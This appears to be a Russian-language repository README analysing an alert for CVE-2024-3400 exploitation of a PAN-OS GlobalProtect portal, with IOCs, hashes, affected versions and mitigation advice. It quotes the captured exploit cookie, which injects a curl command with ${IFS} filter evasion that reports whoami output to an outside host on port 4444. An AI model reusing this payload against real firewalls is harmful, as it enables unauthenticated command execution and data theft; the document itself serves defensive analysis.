
Стратегии обнаружения, анализа и реагирования на попытки эксплуатации CVE-2024-3400, нацеленные на порталы GlobalProtect Palo Alto PAN-OS. Включает IOCs, паттерны эксплойтов и рекомендации по смягчению последствий.
Стратегии обнаружения, анализа и реагирования на попытки эксплуатации CVE-2024-3400, направленные на порталы GlobalProtect в Palo Alto PAN-OS. Включает индикаторы компрометации (IOC), паттерны эксплуатации и рекомендации по смягчению последствий.
Этот репозиторий содержит подробное расследование и анализ угрозы CVE-2024-3400 — критической уязвимости неаутентифицированной инъекции команд, затрагивающей программное обеспечение Palo Alto Networks PAN-OS и нацеленной на портал GlobalProtect.
18 апреля 2024 года была обнаружена активность эксплуатации уязвимости, направленная на внутренний межсетевой экран PAN-OS, с использованием уязвимой конечной точки /global-protect/login.esp. Злоумышленник использовал сформированный cookie SESSID, содержащий команду curl, выполняемую через обратные кавычки, для обращения к удалённому C2-серверу, размещённому на 144.172.79.92 (Майами, Флорида). Полезная нагрузка эксплойта использовала ${IFS} для обхода простых фильтров и телеметрический каталог PAN-OS для размещения вредоносной активности. Межсетевой экран ответил кодом 200 OK, что указывает на вероятное успешное выполнение полезной нагрузки.

Идентификатор события: 249
Правило обнаружения: SOC274 – PAN-OS Command Injection Exploitation
Время события: 18 апреля 2024 г., 03:09 UTC
Имя хоста: PA-Firewall-01
IP-адрес назначения: 172.16.17.139
IP-адрес источника: 144.172.79.92
Метод запроса: POST
Конечная точка: /global-protect/login.esp
Полезная нагрузка cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
Вредоносные хэши:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
: (выполнен с помощью )





SESSID для инъекции команд${IFS} для обхода фильтров/opt/panlogs/tmp/device_telemetrydt_send после эксплуатации4444


10.2.9-h1, 11.0.4-h1 или 11.1.2-h3144.172.79.92logs/: Обработанные и необработанные журналы обнаруженияioc/: Хэши файлов и IP-адреса, связанные с атакойanalysis/: Детальный анализ поведения эксплойта и трассировка процессовreport/: Сводка и изображения журналов и кодов моих исследованийCVE-2024-3400 — это критическая уязвимость в Palo Alto Networks PAN-OS, затрагивающая, в частности, шлюзы GlobalProtect. Ниже приведено описание того, что о ней известно публично:
Показатель CVSS: 10.0 (критическая)
Опубликовано: апрель 2024 г.
Затронутые продукты: PAN-OS 10.2, 11.0 и 11.1 при включённом GlobalProtect.
Эксплуатация: подтверждена в реальных атаках (zero-day)
Тип уязвимости: неаутентифицированная инъекция команд
CVE-2024-3400 позволяет неаутентифицированным злоумышленникам выполнять произвольные команды в операционной системе межсетевого экрана. По сути, это даёт полный контроль над затронутыми устройствами без необходимости учётных данных — серьёзная точка компрометации для любого предприятия, полагающегося на межсетевые экраны Palo Alto.
Шлюз GlobalProtect должен быть включён.
Определённые версии PAN-OS (10.2.x, 11.0.x, 11.1.x).
Эксплуатация возможна через интернет, если устройство не находится за дополнительными уровнями защиты.
Отправка специально сформированных запросов для эксплуатации дефекта инъекции.
Развёртывание удалённых оболочек или загрузка полезных нагрузок второй стадии.
Наблюдаемое поведение включает:
Выполнение команд через специально сформированные URL-адреса
Механизмы закрепления в системе
Горизонтальное перемещение внутри сетей
Немедленно установите обновления: Palo Alto выпустила исправления; обновитесь до не уязвимых версий (например, 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 или более поздних).
Проверьте наличие индикаторов компрометации (IOC), таких как подозрительные процессы, исходящие подключения или необычная история CLI.
Используйте такие инструменты, как Shodan, или инвентаризацию активов для поиска уязвимых устройств.
Ищите внешние IP-адреса, обращающиеся к GlobalProtect без действительной аутентификации.
Проверяйте журналы на предмет подозрительного выполнения команд (show system processes, cat /etc/passwd и т. д.).
Отслеживайте поведение межсетевого экрана и создавайте оповещения об аномальных исходящих подключениях.
Этот репозиторий служит одновременно внутренним отчётом о расследовании и образовательным ресурсом для защитников, стремящихся понять реальную эксплуатацию уязвимостей PAN-OS. Приветствуются вклад и дополнительные наблюдения.
update.py/usr/bin/python3